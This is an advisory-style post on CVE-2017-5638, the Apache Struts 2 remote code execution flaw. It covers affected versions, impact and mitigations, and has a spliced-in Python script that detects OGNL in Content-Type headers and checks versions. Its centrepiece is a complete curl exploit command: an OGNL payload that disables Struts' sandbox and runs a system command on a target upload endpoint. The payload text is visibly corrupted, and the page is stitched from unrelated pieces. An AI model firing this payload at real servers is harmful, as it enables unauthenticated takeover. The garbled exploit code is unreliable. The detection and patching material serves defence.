Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)


How the mentioned CVE works:

CVE-2017-5638 is a critical flaw in the Jakarta Multipart parser of Apache Struts 2. An attacker exploits it by sending a crafted `Content-Type` HTTP header in a file-upload request. The parser mishandles this header and evaluates its value as an Object-Graph Navigation Language (OGNL) expression. The evaluation happens before any file is actually uploaded, so a remote, unauthenticated attacker can inject and execute arbitrary OGNL code on the server. Because OGNL expressions can run system commands with the same privileges as the Struts application server, the result is full remote code execution. The vulnerability is exceptionally dangerous because the attack is simple: a single crafted HTTP request is enough to compromise the entire server.

DailyCVE Form:

Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical

Date: 2017-03-07

Prediction: Patch Available

What Undercode Says:

`curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target.com/upload.action`

How the exploit works:

Craft malicious Content-Type header.

Send HTTP request to Struts2 endpoint.

OGNL expression executes system commands.

Protection from this CVE:

Immediately upgrade to Struts 2.3.32 or 2.5.10.1.

Implement WAF rules to block malicious Content-Type headers.

Filter OGNL expressions at the network perimeter.
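The two defensive actions above (version triage and screening `Content-Type` headers for OGNL syntax, which is the vector the "How the mentioned CVE works" section describes) can both be expressed in a few lines. The following is an added example, not code from the DailyCVE post or from the Apache Struts project: the version ranges come from the advisory fields above, while the regex heuristics, the `screen_upload_request` helper and the sample headers are this example's own assumptions.

```python
"""Defender-side checks for CVE-2017-5638 (Apache Struts 2, Jakarta Multipart parser).

Added example; it is not code from the DailyCVE post or from the Apache Struts
project. It implements two checks the advisory text implies:

  * is_vulnerable_struts_version(): triage a Struts version string against the
    affected ranges given above (2.3.5 - 2.3.31, 2.5 - 2.5.10) and the fixed
    releases (2.3.32, 2.5.10.1).
  * find_ognl_marker() / screen_upload_request(): a WAF-style screen that flags
    a Content-Type header carrying OGNL expression syntax.

The regex patterns and the sample headers are this example's own assumptions.
"""
import re
from typing import Optional, Tuple


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '2.5.10.1' into (2, 5, 10, 1) so ranges compare as tuples."""
    return tuple(int(part) for part in version.strip().split("."))


def is_vulnerable_struts_version(version: str) -> bool:
    """True if the version falls inside an affected range from the advisory."""
    parts = parse_version(version)
    if parts[:2] == (2, 3):
        # 2.3.5 up to and including 2.3.31; 2.3.32 is the fixed release.
        return (2, 3, 5) <= parts < (2, 3, 32)
    if parts[:2] == (2, 5):
        # 2.5 up to and including 2.5.10; 2.5.10.1 is the fixed release.
        return (2, 5) <= parts < (2, 5, 10, 1)
    return False


# Patterns that have no business in a legitimate Content-Type value.
# (Assumed detection heuristics, not Struts' own validation logic.)
OGNL_MARKERS = (
    ("ognl-delimiter", re.compile(r"[%$]\{")),          # %{ ... } or ${ ... }
    ("static-reference", re.compile(r"@[\w.]+@\w+")),   # e.g. @java.lang.System@getProperty
    ("member-access", re.compile(r"_memberAccess")),    # sandbox variable seen in public payloads
)


def find_ognl_marker(content_type: str) -> Optional[str]:
    """Return the name of the first OGNL indicator found, or None if the header looks benign."""
    for name, pattern in OGNL_MARKERS:
        if pattern.search(content_type):
            return name
    return None


def screen_upload_request(headers: dict) -> Optional[str]:
    """Decide whether an upload request should be rejected at the perimeter.

    Returns a reason string for a block decision, or None to let it through.
    Header names are matched case-insensitively, as HTTP requires.
    """
    lowered = {name.lower(): value for name, value in headers.items()}
    marker = find_ognl_marker(lowered.get("content-type", ""))
    if marker is not None:
        return f"blocked: Content-Type contains OGNL indicator '{marker}'"
    return None


if __name__ == "__main__":
    # Constructed sample requests, not captured traffic. The OGNL samples are
    # deliberately inert: they only carry the syntax the screen looks for.
    samples = [
        {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"},
        {"content-type": "application/x-www-form-urlencoded"},
        {"Content-Type": "%{(#_='multipart/form-data').(#x=1)}"},
        {"Content-Type": "@java.lang.System@getProperty('os.name')"},
    ]
    for sample in samples:
        value = next(iter(sample.values()))
        print(f"{value[:60]!r:64} -> {screen_upload_request(sample) or 'allowed'}")

    for ver in ("2.3.31", "2.3.32", "2.5.10", "2.5.10.1"):
        state = "VULNERABLE" if is_vulnerable_struts_version(ver) else "fixed / not affected"
        print(f"Struts {ver}: {state}")
```

The header screen is a perimeter stopgap, not a substitute for the upgrade: it blocks the OGNL syntax every variant of this attack needs in the header, but a patched Struts (2.3.32 / 2.5.10.1) is the only control that removes the evaluation itself.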

Impact:

Complete server compromise.

Arbitrary command execution.

Data breach and system takeover.


Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
